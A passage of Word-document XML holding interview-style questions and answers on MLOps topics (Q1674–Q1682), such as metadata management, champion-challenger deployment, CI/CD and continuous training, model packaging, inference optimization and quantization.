        <w:t xml:space="preserve">      * Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feast</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Extended</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, feature pipelines are critical for scalable, maintainable, and production-ready ML systems because they ensure consistent feature generation, automation, monitoring, and governance across environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1674. What is metadata management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Metadata management is the process of collecting, organizing, tracking, and governing metadata across data and machine learning systems.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Metadata is “data about data,” meaning information that describes datasets, models, pipelines, experiments, and system activities.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In ML and MLOps environments, metadata management helps teams improve traceability, reproducibility, governance, and operational efficiency.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common types of metadata include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Data Metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Dataset source, schema, size, version, and creation time.</w:t>
        <w:br/>
        <w:t>2. Model Metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Model version, algorithm, hyperparameters, accuracy metrics, and training details.</w:t>
        <w:br/>
        <w:t>3. Pipeline Metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Workflow execution logs, pipeline status, dependencies, and execution history.</w:t>
        <w:br/>
        <w:t>4. Operational Metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">    * Infrastructure usage, deployment details, monitoring metrics, and runtime logs.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits of metadata management:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Improved reproducibility</w:t>
        <w:br/>
        <w:t>* Better experiment tracking</w:t>
        <w:br/>
        <w:t>* Easier debugging and auditing</w:t>
        <w:br/>
        <w:t>* Regulatory and compliance support</w:t>
        <w:br/>
        <w:t>* Enhanced collaboration across teams</w:t>
        <w:br/>
        <w:t>* Faster model lifecycle management</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example in MLOps:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Tracking which dataset version and hyperparameters were used to train a specific production model.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular tools for metadata management include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* MLflow</w:t>
        <w:br/>
        <w:t>* Kubeflow Metadata</w:t>
        <w:br/>
        <w:t>* Apache Atlas</w:t>
        <w:br/>
        <w:t>* DataHub</w:t>
        <w:br/>
        <w:t>* Amundsen</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>From an MLOps perspective, metadata management is essential for maintaining governance, lineage tracking, observability, model reproducibility, and efficient management of end-to-end ML workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1675. Explain ML experimentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML experimentation is the process of testing, comparing, and evaluating different machine learning approaches to identify the best-performing model and configuration for a specific problem.</w:t>
        <w:br/>
        <w:t>It involves running multiple experiments with variations in:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Algorithms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hyperparameters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Architectures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Training techniques</w:t>
        <w:br/>
        <w:t>The goal is to improve model accuracy, efficiency, and generalization before deploying the model to production.</w:t>
        <w:br/>
        <w:t>Typical ML experimentation workflow includes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data Preparation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cleaning and preprocessing datasets.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Feature Engineering</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Creating and selecting useful input features.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Model Training</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Training multiple models or configurations.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Hyperparameter Tuning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimizing parameters such as learning rate, batch size, or depth.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Evaluation and Comparison</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Comparing metrics like accuracy, precision, recall, F1-score, or latency.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Experiment Tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recording configurations, metrics, datasets, and model artifacts.</w:t>
        <w:br/>
        <w:t>Key challenges in ML experimentation:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reproducibility</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tracking multiple experiments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resource management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Collaboration across teams</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managing datasets and model versions</w:t>
        <w:br/>
        <w:t>Popular tools used for ML experimentation include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Weights &amp; Biases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorBoard</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Neptune.ai</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, ML experimentation is critical for systematic model development, reproducibility, governance, and accelerating the transition from research to production-ready AI systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1676. What is a champion-challenger model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A champion-challenger model is a deployment strategy in machine learning where an existing production model called the champion is continuously compared against one or more new candidate models called challengers.</w:t>
        <w:br/>
        <w:t>The champion model currently handles live production traffic because it is the best validated model. Challenger models are tested in parallel to evaluate whether they can outperform the champion in terms of accuracy, latency, cost, or business metrics.</w:t>
        <w:br/>
        <w:t>How it works:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Champion Model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Active production model serving predictions to users.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Challenger Model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * New model version trained with updated data, features, or algorithms.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Parallel Evaluation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Challenger predictions are compared against champion results using monitoring metrics.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Promotion Decision</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If challenger performs better consistently, it replaces the champion.</w:t>
        <w:br/>
        <w:t>Common evaluation metrics include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Precision and recall</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Drift resistance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Business KPIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resource utilization</w:t>
        <w:br/>
        <w:t>Benefits of champion-challenger strategy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Safe model upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced deployment risk</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous model improvement</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better A/B testing and validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier rollback capability</w:t>
        <w:br/>
        <w:t>Common use cases:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Credit scoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ad ranking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time prediction systems</w:t>
        <w:br/>
        <w:t>Popular tools supporting champion-challenger workflows include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Seldon Core</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Serving</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, the champion-challenger approach is important for enabling continuous experimentation, controlled deployment, monitoring, and reliable production model management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1677. Explain CI/CD for ML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CI/CD for ML (Machine Learning CI/CD) is the practice of automating the building, testing, training, validation, deployment, and monitoring of machine learning models using DevOps and MLOps principles.</w:t>
        <w:br/>
        <w:t>Unlike traditional software CI/CD, ML CI/CD also includes data validation, model training, feature pipelines, and model performance checks.</w:t>
        <w:br/>
        <w:t>The goal is to deliver reliable ML models to production faster, with consistency and automation.</w:t>
        <w:br/>
        <w:t>CI (Continuous Integration) in ML</w:t>
        <w:br/>
        <w:t>Continuous Integration focuses on automating:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Code integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Unit testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model training triggers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Experiment tracking</w:t>
        <w:br/>
        <w:t>Whenever new code, data, or configurations are pushed, automated pipelines validate and test the ML workflow.</w:t>
        <w:br/>
        <w:t>CD (Continuous Deployment/Delivery) in ML</w:t>
        <w:br/>
        <w:t>Continuous Deployment automates:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model packaging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Containerization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployment to staging/production</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Canary or blue-green deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and rollback</w:t>
        <w:br/>
        <w:t>Typical ML CI/CD Pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data ingestion and validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Feature engineering</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Model training</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Hyperparameter tuning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Automated testing and evaluation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Model registry and versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      7. Containerization using Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      8. Deployment to Kubernetes or cloud platforms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      9. Monitoring and retraining</w:t>
        <w:br/>
        <w:t>Important Components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Source control for code and pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dataset and model versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automated testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Infrastructure as Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automated retraining workflows</w:t>
        <w:br/>
        <w:t>Popular Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GitLab CI/CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Extended</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, CI/CD for ML helps achieve faster releases, reproducibility, scalability, governance, and reliable model lifecycle management in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1678. What is CT in MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CT in MLOps stands for Continuous Training. It is the process of automatically retraining machine learning models whenever new data, drift, or performance degradation is detected.</w:t>
        <w:br/>
        <w:t>Continuous Training extends traditional CI/CD pipelines by adding automated model retraining capabilities to keep ML models updated and accurate in production environments.</w:t>
        <w:br/>
        <w:t>The main goal of CT is to ensure that models adapt to changing data patterns, user behavior, and business conditions over time.</w:t>
        <w:br/>
        <w:t>How Continuous Training Works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. New data is collected from production systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Data validation and preprocessing are triggered</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Model retraining pipeline starts automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Newly trained model is evaluated against validation metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. If performance is acceptable, the model is registered and deployed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Monitoring continues for future retraining cycles</w:t>
        <w:br/>
        <w:t>Common Triggers for CT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scheduled retraining (daily/weekly/monthly)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data drift detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Concept drift detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Performance degradation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * New business requirements</w:t>
        <w:br/>
        <w:t>Benefits of Continuous Training</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Keeps models up to date</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improves prediction accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduces manual retraining effort</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports dynamic real-time systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enables adaptive AI systems</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retraining cost and infrastructure usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data quality management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model validation complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Risk of unstable deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and governance requirements</w:t>
        <w:br/>
        <w:t>Common Tools Used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Airflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Extended</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Jenkins</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, CT is a critical capability for maintaining production ML systems that require continuous adaptation, monitoring, and automated lifecycle management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1679. What is reproducible training?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Reproducible training means the ability to train a machine learning model multiple times and consistently obtain the same or very similar results using the same data, code, configurations, and environment.</w:t>
        <w:br/>
        <w:t>It is an important concept in MLOps because it ensures reliability, debugging capability, auditability, and collaboration across teams.</w:t>
        <w:br/>
        <w:t>For training to be reproducible, all parts of the ML workflow must remain consistent, including:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dataset versions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature engineering logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hyperparameters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Random seeds</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Library and dependency versions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Infrastructure and hardware configurations</w:t>
        <w:br/>
        <w:t>Key practices for reproducible training include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Version Control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Track code, datasets, models, and configurations.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Environment Consistency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use containers and dependency management tools.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Experiment Tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Store metrics, parameters, artifacts, and logs.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Fixed Random Seeds</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduce randomness during training.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Pipeline Automation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use automated and standardized workflows.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Data Lineage Tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Track source and transformation history of datasets.</w:t>
        <w:br/>
        <w:t>Benefits of reproducible training:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier debugging and troubleshooting</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reliable model validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Regulatory and compliance support</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better collaboration among teams</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simplified rollback and auditing</w:t>
        <w:br/>
        <w:t>Popular tools supporting reproducibility include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * DVC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Weights &amp; Biases</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, reproducible training is essential for building trustworthy, maintainable, and production-grade ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1680. Explain model packaging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model packaging is the process of bundling a trained machine learning model along with all required dependencies, configurations, runtime libraries, and serving code into a deployable unit for production environments.</w:t>
        <w:br/>
        <w:t>The main goal is to ensure the model runs consistently across different environments such as development, testing, cloud, or production systems.</w:t>
        <w:br/>
        <w:t>A model package typically includes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Trained model files</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Inference code</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Preprocessing and postprocessing logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dependency libraries</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configuration files</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runtime environment details</w:t>
        <w:br/>
        <w:t>Common Packaging Approaches</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Container-based Packaging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Using containers to package the model and runtime environment.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Most common production approach.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Serialized Model Packaging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Saving models in formats like ONNX, Pickle, SavedModel, or TorchScript.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. API-based Packaging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Packaging models as REST or gRPC services for inference.</w:t>
        <w:br/>
        <w:t>Benefits of Model Packaging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Environment consistency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier deployment and scaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster rollback and versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved portability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simplified CI/CD integration</w:t>
        <w:br/>
        <w:t>Common Technologies Used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TorchServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ONNX Runtime</w:t>
        <w:br/>
        <w:t>Example Workflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Train the model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Serialize the model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Add inference scripts and dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Create a Docker image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Deploy to Kubernetes or cloud platforms</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, model packaging is critical for reliable deployment, portability, scalability, and maintaining consistent inference behavior across environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1681. What is inference optimization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inference optimization is the process of improving the speed, efficiency, scalability, and resource utilization of machine learning model predictions in production environments.</w:t>
        <w:br/>
        <w:t>The main objective is to reduce inference latency, improve throughput, and lower infrastructure cost while maintaining acceptable model accuracy.</w:t>
        <w:br/>
        <w:t>Inference optimization is especially important for real-time AI applications such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Chatbots and LLMs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Computer vision</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Voice assistants</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Edge AI devices</w:t>
        <w:br/>
        <w:t>Common Inference Optimization Techniques</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Model Quantization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Converts model weights from higher precision (FP32) to lower precision (INT8/FP16).</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduces memory and improves speed.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Removes unnecessary model parameters or neurons.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Makes the model smaller and faster.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Knowledge Distillation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Trains a smaller “student” model using a larger “teacher” model.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Batching</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Processes multiple inference requests together for better throughput.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Hardware Acceleration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Uses GPUs, TPUs, or specialized AI accelerators.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Model Compilation and Optimization Engines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimizes computation graphs for specific hardware.</w:t>
        <w:br/>
        <w:t>Popular Tools and Frameworks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorRT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ONNX Runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Lite</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * OpenVINO</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TorchServe</w:t>
        <w:br/>
        <w:t>Key Metrics in Inference Optimization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Throughput</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Memory usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CPU/GPU utilization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cost efficiency</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, inference optimization is essential for building scalable, cost-effective, and high-performance AI systems capable of serving production workloads efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1682. Explain quantization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Quantization is a model optimization technique in machine learning where high-precision numerical values, such as 32-bit floating point numbers (FP32), are converted into lower-precision formats like INT8 or FP16.</w:t>
        <w:br/>
        <w:t>The main goal of quantization is to reduce model size, improve inference speed, lower memory usage, and optimize deployment on resource-constrained devices.</w:t>
        <w:br/>
        <w:t>Quantization is widely used in:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Edge AI devices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mobile applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time inference systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Embedded systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large-scale production inference</w:t>
        <w:br/>
        <w:t>How Quantization Works</w:t>
        <w:br/>
        <w:t>During quantization, model weights and sometimes activations are represented using fewer bits while trying to preserve model accuracy.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * FP32 → INT8 conversion</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduces memory usage by approximately 4x</w:t>
        <w:br/>
        <w:t>Types of Quantization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Post-Training Quantization (PTQ)</w:t>
        <w:br/>
